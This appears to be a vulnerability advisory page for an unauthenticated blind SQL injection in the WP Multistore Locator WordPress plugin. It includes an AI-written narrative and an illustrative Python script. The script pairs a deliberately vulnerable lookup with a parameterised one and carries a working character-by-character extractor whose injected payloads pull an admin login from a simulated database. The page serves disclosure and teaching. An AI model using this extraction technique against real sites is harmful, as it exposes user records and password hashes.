CVE-2025-26974
No known patch is available for this vulnerability.
The affected plugin has been removed from the WordPress.org directory (reason: Security Issue), and no patched version is being distributed through the official directory. If you have the affected software installed, you should uninstall or replace it rather than wait for an update.
Description
Blind SQL injection in WP Multistore Locator <= 2.5.1 allows unauthenticated database access; update to 2.5.2.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The WP Multistore Locator plugin for WordPress, versions 2.5.1 and earlier, contains a critical blind SQL injection vulnerability. The root cause is improper neutralization of special elements used in an SQL command, specifically within a query parameter. This allows an attacker to inject arbitrary SQL statements without requiring authentication.
The vulnerability is exploitable remotely and requires neither user interaction nor privileges. An attacker sends crafted HTTP requests to the vulnerable parameter and, because the injected query's result is not returned directly, infers database contents one character at a time from the application's yes/no behaviour (boolean-based) or response timing (time-based). Because the plugin is widely installed, the exposed population is large, potentially thousands of sites.
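The character-by-character extraction described above, as an added example that is not code from the WP Multistore Locator plugin or from Patchstack: a hypothetical store-lookup handler that concatenates a request parameter into SQL (the CWE-89 pattern the CVE names) next to its parameterised counterpart, plus a boolean-based blind extractor that recovers a value from another table using only the row count the handler exposes. The table, column and parameter names (`stores`, `name`, `search`) and the SQLite back end are assumptions; the real plugin runs against MySQL via `$wpdb`, and the actual vulnerable parameter is not identified on this page.

```python
"""Boolean-based blind SQL injection against a simulated store-locator lookup.

Added example, not the plugin's own code. Schema, column names and the
'search' parameter are assumptions; SQLite stands in for WordPress's MySQL.
"""
import sqlite3
import string


def _build_db() -> sqlite3.Connection:
    """Constructed sample data: a store table the lookup is meant to query, and a
    users table the attacker is not supposed to be able to read."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE stores (id INTEGER PRIMARY KEY, name TEXT, city TEXT);
        INSERT INTO stores VALUES (1, 'Downtown', 'Berlin'), (2, 'Airport', 'Berlin');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bexamplehash');
        """
    )
    return db


DB = _build_db()


def vulnerable_lookup(search: str) -> int:
    """Hypothetical vulnerable handler: the request parameter is spliced into the
    SQL string. It returns only a row count, so an attacker gets no query output,
    just a one-bit oracle (did the WHERE clause match or not)."""
    sql = f"SELECT id FROM stores WHERE name = '{search}'"
    return len(DB.execute(sql).fetchall())


def hardened_lookup(search: str) -> int:
    """Parameterised version: the same input reaches the engine as a bound value,
    never as SQL text (the $wpdb->prepare() equivalent in WordPress)."""
    sql = "SELECT id FROM stores WHERE name = ?"
    return len(DB.execute(sql, (search,)).fetchall())


def blind_extract(oracle, subquery: str, max_len: int = 32) -> str:
    """Recover the single-value result of `subquery` one character at a time.

    For each position, ask the oracle "is character N of the secret equal to X?"
    by appending an AND condition to the legitimate search value. A match count
    of 1 means true. The loop stops when no character matches, i.e. past the end
    of the secret.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    out = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            quoted = ch.replace("'", "''")  # keep the probe itself well-formed
            payload = f"Downtown' AND substr(({subquery}),{pos},1)='{quoted}"
            if oracle(payload) == 1:
                found = ch
                break
        if found is None:
            break
        out += found
    return out


if __name__ == "__main__":
    secret = "SELECT user_login FROM wp_users WHERE ID=1"
    print("vulnerable:", repr(blind_extract(vulnerable_lookup, secret)))
    print("hardened:  ", repr(blind_extract(hardened_lookup, secret)))
```

Run as a script, the vulnerable handler leaks the admin login through nothing more than whether a store row matched, while the parameterised handler treats the whole payload as a literal store name and yields nothing. A real campaign against this CVE would do the same with HTTP requests and, for time-based variants, `SLEEP()`-style delays instead of row counts; the defensive lesson is identical: bind parameters, never concatenate.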
Successful exploitation gives an attacker direct read access to the site's database, including sensitive user data such as account records and password hashes. The CVSS score of 9.3 reflects unauthenticated, network-reachable database access with high impact on confidentiality. Unauthenticated SQL injection in a popular plugin is the kind of flaw routinely picked up by mass-exploitation campaigns.
The CVE description names version 2.5.2 as the fixed release. However, the plugin has since been removed from the WordPress.org directory, so no patched version is distributed through the official channel; sites still running it should remove or replace it rather than wait for an update. For sites that cannot do so immediately, Patchstack provides a mitigation rule that blocks attacks against this flaw, and lists the vulnerability as highly dangerous and likely to be exploited [1].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- wp-multi-store-locator (WP Multistore Locator, WordPress plugin): versions <= 2.5.1
Patches
wp-multi-store-locator: This plugin was removed from the WordPress.org directory on 2025-03-03 (reason: Security Issue). No patched version is being distributed through the official directory. Users who have it installed should uninstall it.
Source: api.wordpress.org · directory page
References